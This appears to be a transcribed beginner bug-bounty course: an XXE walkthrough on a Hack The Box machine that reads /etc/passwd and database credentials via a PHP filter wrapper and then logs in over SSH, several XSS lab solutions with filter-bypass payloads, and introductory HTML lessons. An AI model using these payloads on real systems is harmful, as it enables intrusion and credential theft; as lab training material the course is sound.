All right, I have popped open the Hack The Box machine for us. This is the landing page, and if you run dirbuster or ffuf you will find this db.php, and then we have portal.php; we click this and we are brought to this page. Now, if we go to test it, grab our intercept, put something in here, and send it, we'll send this to Repeater, turn intercept off, and send, and we have this value right here, data, and this is what we get back. We have this data parameter; we can copy it, come to our Decoder, and decode as URL, then decode as Base64, and we see we have this XML. We get an XML return that has basically been Base64-encoded and then URL-encoded, so what we can do with this is try to add to it or adjust it and see if we can pull off an XXE attack by just reversing this: we can add in our own payload, then encode it as Base64, then URL-encode it, and put it back into the Repeater tab right here. So what we'll do is come over and first try to pull down the /etc/passwd file.

Okay, one other way to look at this that is a lot easier, rather than coming into Repeater, going into the Decoder, and decoding this as URL and then Base64 to get to the XML, is that we can go to our Repeater, and remember we have this data here; we can come over to our Inspector and click this little arrow right here, and it will automatically decode this for us, and we will land right here. We can actually make our changes right here, apply changes, and resend this, and get
our response brought back to us. So what we will do is come over to OWASP and grab the XML right here, the XXE; we'll open this up to grab our payload. This is not the one we were in earlier, but that is okay. What we will grab is the DOCTYPE and the file system entity, and we'll stop right here; we can copy this and put it on a new line right here. We'll actually try to see if this will let us put this all on one line so that it looks better for us. Now that we have this on, well, not one line, but it's a little better, here we go, there we go, now it's on one line. What we're going to do is similar to what we've been doing before: we can just leave this however we want; we're actually going to delete this, we don't really need that, and it looks a little better for us. This goes on a different line, I guess we'll leave it. Okay, so here we go: what we can do at this point is type in etc/passwd, and then down here we need to call the xxe, so we can type our ampersand, xxe, and our semicolon, apply changes, and if we send this, in the response you can see right here we have the passwd file brought down for us.

One of the things we always should look at, especially when we are on a Hack The Box machine, some kind of CTF, or even a pen test (on a bug bounty program you really wouldn't do this), is to look for the users, because you may be able to attack some of them. So we have the development user, here's the user ID, we have root obviously up here, and what you can do is just look for the ones that have /bin/bash; those are the ones that will have a shell available. So we have development and root, and on a quick look I'm not really seeing any others. Now what we can do is try to pull down that db.php file, but in order to do that you will have to use a PHP wrapper, and those are something I would suggest learning, because you will see them every now and then. Whenever you see a PHP system running, a lot of times you can try a PHP wrapper and see if you
can pull down the information that you should not be able to, and there are a lot of different places you can use those PHP wrappers, but one of those places is going to be right here. So instead of pulling down a file, what we're going to do is type in here php, delete all of this, and type in `php://filter/convert.base64-encode/resource=`, and instead of the /etc/passwd file what we're going to be looking for is db.php. If you're familiar with doing CTFs or any kind of pen testing, you will know that you can typically find the files for a web application inside of /var/www/html, so /var/www/html/db.php; this is pretty standard for where you're going to find files on a Linux system. We can apply changes, copy this, go to the Decoder, paste this in, and as we decode it with Base64 it tells us that we have this in our response. This would be what was brought back with our PHP filter, and we have a username right here, we have the database name, and we have a password right here, and we should be able to SSH in as the development user using this password, because it's really common for people to reuse their password, and this will actually lead to remote code execution. So if we come over here and say ssh, and then, let's make sure we have that user right, I think it was development, so development@10.10.11.100; we might have to grab that user again. We'll say yes, come over to the Decoder, grab the password, paste that in, and it worked. So this is how you can get remote code execution on a server using XXE. This one was really complex, but XML injection is something you should look into and try to learn. I would suggest going back to PortSwigger and maybe practicing a few of their XXE challenges, as well as Juice Shop, and just play around with it until you feel like you are comfortable and you
understand what is going on so there are three different ways that you can use xxe in the cyber security testing World okay one of the most common vulnerabilities is going to be cross-site scripting or it's also known as xss and this vulnerability is common but it's also going to be pretty hard to exploit without knowing some form of HTML and JavaScript so there are basic payloads that you can go in and you can just test a bunch of them and I'm going to show you a list that I found it's got over 6500 different ways to try and exploit this but most of the time you're going to have to inspect the page and modify the content but we'll get to that in just a little bit I'm going to show you just a couple of cross-sized scripting examples here and then I kind of want to show you the code of what's going on I think you'll be able to understand it even if you know zero programming so with that we'll go ahead and I'll show you an example of what cross-site scripting is and then I'll explain why it's so dangerous and so this is going to be the most basic simple form of cross-site scripting and so all we want to do is have an alert pop up and if you can pop up in an alert on a bug Bounty program you will be able to submit that for a vulnerability and there you'll see them a lot of a lot of places a lot of people like to look for them I don't really look for them all that often because I think most people look for these and if it's not stored across site scripting then you're not really going to get paid for the amount of time that you put in you'll get paid but just not for not enough for the amount of time it's going to take to find them so we're going to do this with an image and image tags will go image source equals and then we leave it blank and when this is blank it's going to make an error on the page and so on error we want to alert which is going to give us the ability to pull off the cross-site scripting and we're just going to alert one and then we will close the 
tag and I have made a mistake somewhere let's go ahead and delete this equal sign there it is so we have the alert pop up and it says localhost one now what you can do with a cross-site scripting and why it's so dangerous is not because you can just pop things up on somebody's screen but what you're able to do is you could make this look really fancy and you could say log into a Wi-Fi or log into this page or your you were accidentally logged out and people can type in their username and their password and then all of a sudden you have their credentials you can put alert document.cookie right here and then all of a sudden you can steal their session and so there's quite a few different ways that you can use this to get malicious with it and so that's why it's so dangerous but it's also really common it's going to be in the top 10 vulnerabilities that you're going to find on pretty much any list and so right here is a different version so right here it's just plain as can be you can type whatever you want and nothing's going to get blacklisted so right here I have made a little it's really short it only has the image tag but you can type your script the image has been blacklisted so what I mean by that is if you watch what happens every I finished typing image and it automatically deletes it this will happen on programs that you're going to test that they'll have characters that are blacklisted I have come across that I come across it regularly I have come across across blacklisted characters when I was trying to do a SQL injection so you'll come across blacklisted characters what you'll do is you can go out and you can find encoders and you can encode your payloads in order to fit your specific needs and in this case it's pretty simple all you have to do is go I and make a capital M and A G and it doesn't get deleted or you could go capital i m g and this is a way that you'll find expression and capture the flags to bypass blacklisted characters or words is you 
just change it a little bit, or you can encode it, and you can bypass the filter. So we could do the exact same thing that we had done before: we'll go on error equal alert, we'll just do alert one, and then we'll close it off, and there's the alert. All we really had to do was change the image tag, because the image had been blacklisted but we were allowed to pull up a different version of the image tag.

What this looks like here is we have banned characters. People will ban these characters so that you can't inject your code, but I will show you. In this case I actually banned this character, the backslash, so no matter how many times I push it it's not going to come in. You will find the backslash banned, because if you can't close a tag then it's going to be really hard to pull off a cross-site scripting, not impossible, but you can still do it. And what this looks like is I am just replacing the image with an empty string, and over here we have the banned characters, you can see right here you're not allowed to use those, and I replace them with an empty string. So this is what a blacklist would look like: you just have a bunch of characters listed that are blacklisted, and you're not allowed to type them in. So when you have a banned backslash, which you're probably only going to see in capture the flags, something like this, what you can do is actually make a button tag like this, if I can get that right, there we go, and then you can just type something in here, and then you can type in on click equal and do the same thing, you put your alert and we'll put our one, and we don't have to have a closing tag, we don't have to close that. So we click it and there's the alert. You will see this in one of our practices when we practice the cross-site scriptings. So those are just a few ways you can pull
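The blacklist described above (deleting the literal string "img" and a short list of banned characters) is easy to reproduce and compare with the defence that actually holds up, encoding the value for the HTML context at output time. The following is an added example, not code from the course or from the demo applications it shows; the filter, the `escapeHtml` helper, the detector regex and the sample payloads are constructed here for illustration.

```javascript
// Added example: a naive XSS blacklist of the kind shown in the lesson, next to
// contextual output encoding. The filter and samples below are constructed.

// Naive blacklist: delete the literal string "img" (case-sensitive, like the
// demo) and a few banned characters, then trust the result as HTML.
const BANNED_CHARS = ["\\", "'", '"'];
function naiveBlacklist(input) {
  let out = String(input).replace(/img/g, "");
  for (const ch of BANNED_CHARS) out = out.split(ch).join("");
  return out;
}

// HTML-text-context encoding: every character that could start or alter
// markup becomes an entity, so the browser renders it as text instead of
// parsing it as a tag or attribute.
const ENTITY = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
function escapeHtml(input) {
  return String(input).replace(/[&<>"']/g, (c) => ENTITY[c]);
}

// Rough detector used only to judge the two outputs: is there still a tag
// (letter directly after "<") carrying an on... event-handler attribute?
function looksLikeEventHandlerTag(html) {
  return /<[a-z]+[^>]*\s+on[a-z]+\s*=/i.test(html);
}

// Constructed samples mirroring the lesson's payloads.
const SAMPLES = [
  "<img src=x onerror=alert(1)>",    // lower-case img: the blacklist strips "img"
  "<IMG src=x onerror=alert(1)>",    // case variant: the blacklist misses it
  "<button onclick=alert(1)>click",  // no "img", no banned characters: passes
];

// For each sample, does a live event-handler tag survive each defence?
function compareDefenses(samples = SAMPLES) {
  return samples.map((s) => ({
    input: s,
    blacklistStillDangerous: looksLikeEventHandlerTag(naiveBlacklist(s)),
    encodedStillDangerous: looksLikeEventHandlerTag(escapeHtml(s)),
  }));
}

console.log(JSON.stringify(compareDefenses(), null, 2));
```

Run it with node: the case variant and the button tag both slip through the blacklist, while the encoded output is inert for every sample. That is the practical lesson behind the bypass the video shows: a filter that deletes known-bad strings has to anticipate every variant, whereas encoding at the output point does not care what the input looked like.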
off the cross-site scripting. I want to show you a page that has a ton of cross-site scripting payloads, and here it is. You can actually just Google cross-site scripting payloads, which we'll go ahead and do right now; I'll walk you through it. We'll just type in payloads and click the first one, and here's going to be a list, so you can get an idea of how many are out there and the different ways you can do a cross-site scripting. This is why I'm telling you there's a lot of different ways to do these. We'll actually see one similar to this in just a few lessons, because we're going to have to close off a tag, and then we're going to have a character blocked, and then we'll actually be able to insert the payload. So there's a ton of different ways to pull these off. It's going to require some knowledge of HTML and JavaScript, or, if you're on a capture the flag, you can just go to Burp Intruder and send this entire list until you are able to receive the solved challenge. But with that, this is a basic introduction into cross-site scripting, and we'll get a little more hands-on and I'll have you guys start practicing writing your own payloads in the coming lessons.

Okay, for this challenge I want you to come to the HackerOne, or the Hacker101, CTF. This is HackerOne's practice site for us to practice what we've learned. You can come in here to the easy one with two flags and click go. If you would like the challenge: we have already seen the XSS in this challenge, I showed it to you in the last lesson, so if you want to go ahead and look for it on your own you can do that. I think you have the knowledge to solve this challenge all on your own without any help, but I will do a walkthrough here in just a second. So if you would like the challenge, go ahead and see if you can find the cross-site scripting, and you can do that now.

Okay, once we're in here you can go through, and one of the first things, if you
remember from the recon lesson, is to click through and just open up everything in the page and see what you can find and what you can do. I actually just thought of another way to try and solve this challenge that I might try and see if it works. You can come back and go back to the home page, you can create a new page, and you can just click through and see what you can find. But in the markdown they actually give us a clue as to how to solve this challenge: you have this random button here, it doesn't do anything, but if you edit this page we have the tag for a button. So if you were unable to find this, you can go ahead and try and solve the challenge now, because if you remember, if we have a button we can come in here and go on click, and then we can put in our alert and then put in one. So we have our on click here and it's closed off, and we should be able to save this, and on our click we are given the alert.

I just thought of, I bet we could copy this. There's another way you could have solved this: if you didn't see this button here and you didn't have this clue, but you came into the testing and edited and you saw this, you might have thought to go ahead and just insert your own button, and you could have pulled off the same thing, just on a different page. We'll go ahead and change this to just click, so you can see it's a different button on a different page, and we could have done the same thing. So that is another way that we're able to pull this off. We're going to see a couple more examples, and the reason for this is that cross-site scripting is a rabbit hole that you can go down indefinitely; there are thousands and thousands of different ways to pull this off. I just want to show you the basic introduction into cross-site scripting, because without knowing HTML and JavaScript it's going to be kind of challenging to pull these off, and since this is a beginner course I'm not really
expecting any software developers to be in here wondering how to do a cross-site scripting, because if you're a developer you're going to already know, because you will have had to write code to defend against it.

Okay, we are going to come back to PortSwigger and we're just going to do a few of these, so you get an idea of how cross-site scripting works, how people can attack it, and a little more understanding of seeing these in the context of how they relate to pulling off these vulnerabilities, especially for beginners, since you can just copy and paste some of these into search engines and search bars, and you will see them on HackerOne and the Hacktivity, so you understand what's going on. So we'll go ahead and open up this first lab here, and we will be told what we are supposed to do: we're supposed to call the alert function in order to solve the lab. This one is going to be one of the most basic cross-site scriptings that we're going to see, and one of the common ways to check whether a website or web application has any defense against cross-site scripting in a search bar like this. What you can do is come in here, and this is basic JavaScript, so we just type in script, and then we type alert one, and then we close the script tags. This is just a basic JavaScript command here, and if this has no sanitization then this should work. You can try these in search bars, you can try them and post this script to any kind of social media outlet for the web application and see if it pulls back any cross-site scripting. So we'll go ahead and search this, and it says we have timed out, because I opened the lab before I started this video, so we'll go ahead and reopen the lab and let that load. Once this is loaded I will just paste that in, and we'll search it, and it pulls back the alert. We were able to alert one and it says we have solved this challenge. Now in the next challenge
we are going to go over the DOM cross-site scripting, which I actually think is down here, because this is one that we have seen with the innerHTML, this one right here. So if you would like to go ahead and open this up and give it a try and see if you can get this to pull the alert: we have looked at this payload before, it's not new to you, you will have seen it, so you can go ahead and try and find it on your own.

Okay, so how did you get along with that challenge? We can come in here, this is the lab we're going to be working on, we can open it up. We're going to be setting what we type in to the innerHTML, which means what we are typing in and searching for is going to be saved on the client side, which means it will try and render it. This is what I set up when we looked at the very first examples on the application that I used to give you examples; if you go back and look at it, it says dangerouslySetInnerHTML, which is just innerHTML with the React framework. So this is going to be the exact same type of vulnerability that we have already witnessed at the beginning of this section on cross-site scripting. You can go ahead and open up the lab and we'll have our search bar, and we're going to be doing essentially the same thing we did in the beginning, where what we type in is going to be rendered on this page. So we can type in our image, and then we'll do our source, which is where it's going to look for the source. You can actually type anything in here; it's going to look for a file saved in this application with this name, and it's not going to find it, and that's going to cause an error. And what do we want to do on error? We want to alert, and here you would put your proof of concept, because we just want to prove that this works, and you can type in xss, or you can type in one, or whatever you want. We will go ahead and close that off, and we can search this, and there is the alert for us. So with that, that solves
this lab, and we are going to try one more. I'm going to show you, this is a little more towards the intermediate level of cross-site scripting, but it's just a way for you to know more about cross-site scripting, so if you come across it and you really think there is a cross-site scripting vulnerability in a website, you know how you can work through that and maybe do some more research on your own to try and exploit it.

Okay, this next lab is going to be one that gives an example of what it looks like to start looking for cross-site scripting in a little more of an intermediate or advanced way. This is probably the most common way that this is going to be found, because you're going to have to inspect the element and know how to break out of the HTML or the string that you're stuck in, in order to pull off JavaScript and run it within the application. So we're going to go ahead and open up this one right here, and over here it'll tell us what we need to do: we just need to break out of the JavaScript string and call the alert function. So I went ahead and opened this up, and the most common way to do something like this is to type in something that you can remember what you typed, or something really easy to find. So we'll type in one two three four and hit search, and now what we'll do is inspect the element, or you can view page source; we'll actually do that, it'll be a lot easier to see. So we'll view page source and then we find our one two three four five. But this is not where we're going to be breaking out of this. See, this is a script tag, the search term right here, we searched for one two three four five, and we have the closing script tag here. So in order to close out of this we can actually put a script tag up here in our search query, and it will close all this off: this script tag will match this script tag, and then we should be able to open up a new script tag, and it will run in order, it'll run all of this in the
order that it is laid out, and then we should be able to put in our payload. So we'll come back to our lab, and what we should be able to do is close off the previous script tag, so that will close this tag and everything before it will be inside that tag, and then we should be able to come in here and type in our own payload. So we'll go script alert, and we will just alert one, and then we can close off our payload, and look at it, make sure it looks right, and that should work. Then we'll go ahead and search it, and there is the alert, which means we've solved the challenge. And everything after that script tag will get rendered on the page because it doesn't have an opening tag, if you're wondering why this showed up. So we'll go ahead and look at the page source and I'll show you the difference: see, here is where we closed off that script tag, and then here we put in our payload, and then because this script doesn't have an opening tag, this just gets rendered on the page as plain HTML.

So if you are unfamiliar with programming this probably doesn't make a whole lot of sense to you, but when it comes to cross-site scripting it's kind of going to be necessary to understand HTML and basic JavaScript in order to pull this off. The reason I included this in this beginner course is because cross-site scripting is one of the most common vulnerabilities, so I wanted you to be aware of it, and maybe you can practice it and see if you can get better, or, if you want to before you take the intermediate course, go learn some basic HTML and some basic JavaScript. It won't take long: you can learn HTML in a week, you can learn CSS, which is how to make a website look pretty, in a very short amount of time, a couple of days, and then you can learn basic JavaScript probably in another week. It doesn't take long, it's pretty simple to learn. So I wanted to show you cross-site scripting, I want you to be aware of it. Look at how many cross-site scripting labs exist on PortSwigger, and I
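The lab above works because the search term is copied straight into a JavaScript string literal inside a script block, so a closing script tag in the input ends that block early and the HTML parser picks up whatever follows as new markup. The following added example is not the lab's code; the page template, the probe string and the helper names are constructed here. It puts that vulnerable pattern beside the fix a developer would apply: serialise the value as a JavaScript string literal and write `<` and `>` as Unicode escapes, so the HTML parser can never see a closing tag inside the script.

```javascript
// Added example: why a value embedded in a <script> string needs
// JavaScript-string-context encoding, not just HTML escaping.
// The template and probe below are constructed for illustration.

// Vulnerable pattern from the lab: the term is interpolated into a JS string
// literal with no encoding at all.
function renderUnsafe(term) {
  return `<script>var searchTerms = '${term}';</script><h1>Results</h1>`;
}

// JSON.stringify produces a valid JS string literal (quotes, backslashes and
// control characters escaped); the extra replacements turn "<" and ">" into
// \u003c and \u003e, which the JS engine reads back as the original
// characters but the HTML parser never sees as the start of </script>.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, "\\u003c")
    .replace(/>/g, "\\u003e");
}

function renderSafe(term) {
  return `<script>var searchTerms = ${jsStringLiteral(term)};</script><h1>Results</h1>`;
}

// Did the input terminate the script block? A correctly rendered page has
// exactly one closing script tag, the template's own.
function scriptBlockBrokenOut(html) {
  return (html.match(/<\/script>/gi) || []).length !== 1;
}

// Constructed probe in the shape the lesson describes: close the script
// block, then open a new one.
const PROBE = "</script><script>alert(1)</script>";

console.log("unsafe page broken out:", scriptBlockBrokenOut(renderUnsafe(PROBE)));
console.log("safe page broken out:  ", scriptBlockBrokenOut(renderSafe(PROBE)));
console.log("safe literal:", jsStringLiteral(PROBE));
```

The point a tester should take away is the one the video makes about context: inside a script block, HTML entities would be wrong (the JavaScript engine would receive `&lt;` literally), so the value has to be encoded for the JavaScript string it sits in, and the `\u003c` form exists precisely so that the browser's HTML tokenizer, which runs before the script does, never sees a closing tag.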
think they actually have, yeah, DOM vulnerabilities, so even more cross-site scripting. So there's a bunch of cross-site scripting, it's really common, but it does take some programming knowledge to solve. And so with that, I will see you in the next video.

Hey, thanks for stopping by my channel. In this video we're going to cover everything I think that you need to know as you are starting your bug bounty journey within the realm of HTML and JavaScript. This is just an introductory course, so if you find this video helpful please let me know if you'd like me to expand this course into a full HTML and JavaScript course for the purpose of bug bounty hunting and ethical hacking. My goal for you in this course is to come away with the ability to read HTML when you inspect the source code or view the page source. I want you to be able to understand what's going on, what all the tags and the links within the HTML are, and how it all fits together. So I'm going to walk you through how to actually write some HTML, and then from there we're going to move on to view the CSS and how it organizes and beautifies the HTML, and after that I'm going to cover some very basic JavaScript. My goal isn't to teach you how to code in JavaScript, but rather just to be able to understand what the JavaScript is doing when you see it. I want you to be able to recognize the variables, the for loops, the while loops, and what exactly the JavaScript is doing when you come across it. So with that, let's go ahead and jump into it.

Okay, so here we are at codepen.io. We're going to be starting out with basic HTML and how to understand it. You can come over here, go to this web application and click Start Coding, and it will load up for us what we need. You might have a display that looks something like this or this; I like it all the way over here to the right, so that way my actual website will look similar to the way you would see it in an actual
browser. We can come over here and minimize this, and we can minimize this, because we're not going to be dealing with CSS or JavaScript just yet, just basic HTML and tags. I want to show how HTML tags look. So what is HTML? It is the HyperText Markup Language, and it's the language of the internet. There's also XML, which is another markup language, but we're not going to deal with that just yet because we are on HTML. With HTML you can make static websites; they won't look very nice, but you can make them, and you can do this with just HTML. So let's just start coding along and you'll be able to understand it as we go. Let's say we're making a journal entry for a book, or we're just making a table of contents. You could start out with just a basic H1, and then you'll make another H1, only you're going to put a forward slash, and we're going to close it out, and in here we can say this is a title, and it will render for us over here. We have this closing tag, and this closing tag is actually really important, because let's say I had "by me": as it loads this it's going to put all of this in here, and it puts it all in big font, and when we close this out, like we already saw and the way you're supposed to do it, it will load differently. You can see the H1 makes the text really big, and let's say we want to enclose the "me" down here with an H2, just like this; you can see this has changed right here and that it is smaller. And if we make this, let's say we want to make this an H4, you can see as the numbers go up the size of the font gets smaller. So the H1 is for the top heading and everything gets smaller from there. Then you also have a paragraph tag that looks like this, and in here would be what you would consider a paragraph, so you can just write something in here and then close this out just like this, and you'll be able to see that it renders just the same, and now we have this paragraph tag. So you have headings
and paragraphs, and you can format the text and the style with the CSS, which we will do later, but right now I just want you to have a basic understanding of how HTML works and be familiar with these tags. You can actually go to a documentation website such as w3schools. For now I want you to get an understanding of these tags, and you can go to w3schools and read the documentation about all the different tags. We're going to see quite a few different ones as we go along, but these tags become really important for cross-site scripting and other vulnerabilities, because we're going to have to learn how to break out of these tags in order to insert our own malicious code in the future.

Okay, so now that we are familiar with a closing tag, there are some kinds of tags that do not require a closing tag, and these are typically tags that do not have any input, unlike these, which all take some kind of text that they render on the page. There are some tags that are self-closing, such as a break tag; this tag does not take any text or input, and what it does is it spaces out these gaps right here. There is also another tag called an HR tag, and this will place a line underneath the text. This is usually done in basic resume-style HTML websites; you won't really see a whole lot of this in actual web applications, and if you do, usually stuff like this is done with a border inside of CSS in a div. But this is something to be aware of: there are self-closing tags within HTML and you will probably see these. I want you to be familiar with all the different kinds of tags you are going to be seeing when you're looking through source code and looking for vulnerabilities, as well as trying to figure out how to get a cross-site scripting to work. It is always helpful to be familiar with the tags, because some tags may be blacklisted while others are not, and they can be helpful in helping you break out of an HTML element in order to get a cross-site
scripting to work. Another thing to be aware of: if you see something like we just saw with the HR, and we see this pop up on the screen, and we decide we want to add a size to it to make it bigger or smaller, you can see this is running in pixels, so if we do 39 that's going to be really big; I meant to make it just nine. You can see that our line shows up, and I think you can also add a shadow, but I don't remember how to do that with an HR tag. If you ever see this and you're wondering, wow, I really like how this looks, I would like to be able to make a tag that looks just like this one on a web application, you can inspect and actually just look to see exactly where it is. Let me see if I can, we'll grab this, inspect, and right here you see the HR size 3. It's really important to be familiar with inspecting specific things, because it's possible in the future that you're going to have an input field, and you are able to search and it renders within the HTML, and you're going to need to be able to inspect to see where the word is within the HTML so that you know exactly what you need to do in order to break out of it to get your malicious code to run. We'll get more into that in the future, but for now let's continue with HTML, what it looks like, and becoming more familiar with it.

We're going to move on from here and we're actually going to install a text editor. I'm going to have you install Visual Studio Code if you're new, or you can use whatever text editor you would like, but I'm going to be using VS Code. What we can do is come over here and just type in VS Code, just like this, and you will come to this page right here. You can click download and download it for whatever OS you are using, and go ahead and download it and then install it; it's pretty simple to install and open up. When you are here you will want to make a new folder. I'm just going to leave it, we can barely see my folder over
here. I'm going to rename it test app; you can call yours whatever you would like, and then we're going to open it up. So we'll come over here, click open, go to Desktop, and I named it test app right here, and I can open this and it will open over here just like this. We can open up a new file and call it index.html, and when we hit enter it's going to open up our index.html. Because we're in VS Code, right here is where you go to install plugins. I'm just going to have you install one plugin right now: we're going to type in boilerplate, I think you could just type in boil, yes, and it goes ahead and opens this up. We want HTML Boilerplate and you'll hit install right here; I already have it installed. Then when we come back to our index.html, if we just type in HTML we can go down to this fifth one right here and hit enter, and we'll be given the boilerplate, and now you can delete this right here. This is how we want to keep it, so we can save this. A helpful tip to render what we have going on in a browser: we can just right-click and say we want to open with Google Chrome, and it will open up a page for us like this. I actually want to put this page over here so you can see it. If we just come over to our body right here and type in, let's make it an H1, and we'll just say hello world, save this, and if we come over here and refresh our page it will render our hello world. So now that we know everything is working, we're going to begin looking at a little more in-depth, advanced HTML that we will need to know in order to break out of our HTML to perform cross-site scripting and insert JavaScript. So with that, I'll see you in the next video.

All right, so we have our own little web application running over here, and now we're going to enter a little bit in here. So instead of this H1 we can enter our name, and we'll make an entry like we would see in something like a Wikipedia page. So you have a name, and then you're
going to want a title, and the title is going to be what goes on up here, like "create a plan" or a React app. We're going to go ahead and name it, and this actually goes inside the head tag, so we can open this up, title; I guess I probably shouldn't open that up, because if I close it off I think it'll automatically close it for me. We can say Ryan's site, and then we'll save it, and if you come over here and refresh this it should refresh for us: we got your site and your name. You can add in a paragraph tag, so we can say what we want to say about ourselves right here inside this paragraph, and we can say I am learning to become a hacker, so this is true for all of us here. Maybe we want this "hacker" right here to be italicized and bold, so we can come in here and say we want all of this to be emphasized, and it closed that off there for us, and we'll paste it over here and save this. And maybe we want the word hacker to be bold, so we can come in here and say we want this to be strong, and we can move this as well, and now if we save this and refresh our page over here it has all become italicized. I'm not sure why this didn't become bold for me, I believe that's supposed to be bold, but that's okay if it doesn't work for us; my goal right now is for you to understand that there are different tags. We can actually add in a break tag: say we decide we want this word hacker right here to be on the next line, we can add in a break, and we can refresh it, and now we have it on the next line. And maybe we decide after this that we want a line underneath everything, so we'll say we want the HR in here for the line break, and if we refresh this we now have our line. So we're starting to get an entry form here, kind of like a Wikipedia page; I actually should look at a Wikipedia page so I know what they actually look like, but anyway, my goal for us is to begin to understand these tags. We're going to look at a few more
tags, and then we're going to start looking at what goes inside these tags, because sometimes you'll be inside of something that looks like this and you're going to have to figure out how to break out of this tag, because your input will be saved inside of a source or inside of something within a tag. So we're going to learn more about inputs over here in just a little bit; for now we're going to look at a few more tags that are really common and that you're going to see a lot when you look at page source. Now that I'm about to close this out, I actually see that I spelled the word strong wrong here, so if we save that and come over here and refresh our page, it becomes bold for us. So inside of our HTML and our tags we will need to spell things correctly, otherwise the interpreter will not know what we're doing or how to translate it into the web page. Okay, with that I will see you in the next video.

Now I want us to look at lists, and in the next video we're going to look at image tags, which are going to be really important because they're a main way to get an XSS to work, so those will be coming up. For now we have our little web app that looks like this, and underneath the HR we're going to add in a list. The way to add in a list can be done with a UL, and you just add in an LI like this, and now we're going to type into our list: we're going to put in "I have learned about tags", and in our next one, dang it, in the text editor you can hit Tab and it'll go past your tag for you, and then you can go down to the next line. So we'll add another list item just like this and say "I have learned about lists", and then we can say lastly, "next I will learn about image tags". Now if we save this, come over to our page and refresh it, we have these bullet points just like this, and if we want them to be numbers it's pretty simple, you would just change this to an OL like so. I forgot to save it, and now we can
refresh the page and we have one two three. So these are lists and tags. You'll see these sometimes, you'll be able to have inputs, and one of the really popular places to see something like this is inside of some kind of task manager. You will see these in live programs, or maybe in a penetration test where you are testing some kind of application that is supposed to help you schedule, and you'll be able to input lists and things like this, and maybe there will be some way for you to inject either over here or over here. But these are the LI tags and this is the OL, so when you see this in a page source you now know what is going on. Now we're going to move on to the image tag and we're going to pop our first cross-site scripting, only we're going to use an alert, because we're not going to be injecting it into anything, but I want you to see how it works, because you're going to see these image cross-site scriptings a lot in the future. They are really popular if you can get one to store, for the cross-site scripting to pop every single time the page loads. So with that, we will move on in the next video.

A few more things to go over and learn before we are ready to start practicing cross-site scripting elsewhere, and the first thing we need to cover is an image tag. The image tag is going to be one that you're going to see a lot in CTFs and practicing cross-site scripting, because it will automatically render on the page whenever it is loaded, or if there's some kind of submit button for an onerror to cause an event. So with that, we will just start out with a basic understanding of inserting an image. If you just type in IMG it should load for you; you have this alt, which is what's going to load if the source doesn't work, so we can just say Ryan, because I'm going to use my image, and if we save this, and we'll say the source is "lost", so obviously there's not going to be any source, and if we come over here and refresh the page we see Ryan, and it tells us a little
image is not found. But if we go out to, say, Google and type in "who am I" and "PhD Security", and then go to images, here I am right here, and we can copy the image address right here; make sure, I'm trying to read those, make sure that's right. If we paste this in here and save this huge link, when we refresh our page, our little browser that we have created right here is going to go out to this linked address that we have right here on YouTube to grab my image, and it's going to ping it and make sure that we have permission to load this image. So if we save this and refresh, you can see my image has popped up right there. Now I don't like where this is at, so I'm going to delete this. That's one way to grab an image, and you will probably see that in the future, and you'll definitely see, when images aren't loaded, that's usually what's happening. Now I already have the photo over here, same photo; you will see this as well, this is the most common way to load an image and it's also the most reliable way. I actually want to put it underneath my name because it'll look better in our little wiki page right here. So if we do our same thing and say image, and the source is just ryan.png, because it is already loaded right here for us, and we save it, we can put in the alt, which would just say my name, and we save it and refresh, you see it moves up here, and that is because it's grabbing the link right here.

Now, I think the most popular way to perform a cross-site scripting, especially in CTFs that don't have any kind of blacklisting, is going to look just like this: source, you just put some mumbo jumbo in there that's not going to work, and the alt doesn't really matter; what you're going to see is an onerror, and then it's going to do something, and usually the do something is going to be alert one. Then save this, refresh our page, and you see the cross-site scripting pops right there for us. You'll see something like, sometimes people will put in
a one, sometimes people will put in xss, and sometimes you can just see a one two three. Save it, we got too many closing brackets, and on our page over here, refresh, we see this page says one two three. That is probably the most common cross-site scripting that you're going to see in beginner CTFs, and the reason you're going to see it done like that in the beginning is because this is really easy and your input isn't being stored anywhere. We're going to get a little more complicated as we go along with the cross-site scripting. This is how you're going to see images loaded in HTML, and this is how you're going to see a lot of cross-site scriptings performed; you're going to see this image payload all over the place. So if we come back to our payloads, look, we have image, image, image, and you always see this onerror, and here's an onclick, and you're just going to see a lot of these image tags, here's another image tag. So you're going to want to be familiar with understanding the image tag and then how to perform the cross-site scripting with it. As we go along things are going to get more interesting and a lot more fun to try and break out of. I know cross-site scripting doesn't pay a lot of money usually, but it is a lot of fun to break out of the HTML tags and bypass the bad characters. So with that, we're going to look at a hrefs and hyperlinks in the next section, and then we're going to start looking at getting cross-site scripting to work for us, and after that we're going to start looking at cross-site scripting and breaking out of HTML tags. So with that, I will see you in the next video.

Okay, so we're here with our code for our very simple website that we have going on right here, and so far we have just a static website with nothing really going on. I want to move on into a hrefs, and we're going to build this inside of an anchor tag. Right now, if we refresh this page, we're going to get our XSS, so we're going to go ahead and comment this out. I
think you can just click at the end of the line yes you can you can click at the end of the line and on a Mac you hit command forward slash or command question mark and it comments out the line there for us and below this we're going to add in our anchor tag which is just going to make us have a clickable link so we're going to go href which this is going to be the link that we are actually wanting to add to our website and we're going to just give something very basic like google.com so we can go HTTP s forward slash and then we go www.google.com and if we save this and then we come over here and refresh you will see our link when we add it in over here Google I forgot to add that text in and I forgot to save it so we'll save it refresh our page and now we have this link right here and if we open link in new tab we are taken to Google so this is really simple and you can actually I've actually been seeing these little anchor tags also inside of the source right here be come a place for cross-site scripting I'm not really sure why developers have been making it so your user input say there's like an input box or you can just come up here and you would do something like this and just add in a parameter of something equals and then xss or script right here I've been seeing at least twice in the last month that right there that xss would get stored either right here or right here and all we have to do is break out of these little links or the source or the ahref in order to get our cross-site scripting to work so we'll just pretend for now rather than actually build an input because that's going to require some JavaScript in order to get it to be saved inside of this link but one of the things you should always do and always check for is if you can add in a parameter right here like this or you're able to just insert something into like a text field and hit search like on a search bar on Amazon or Google and then you inspect the text like this you should always check 
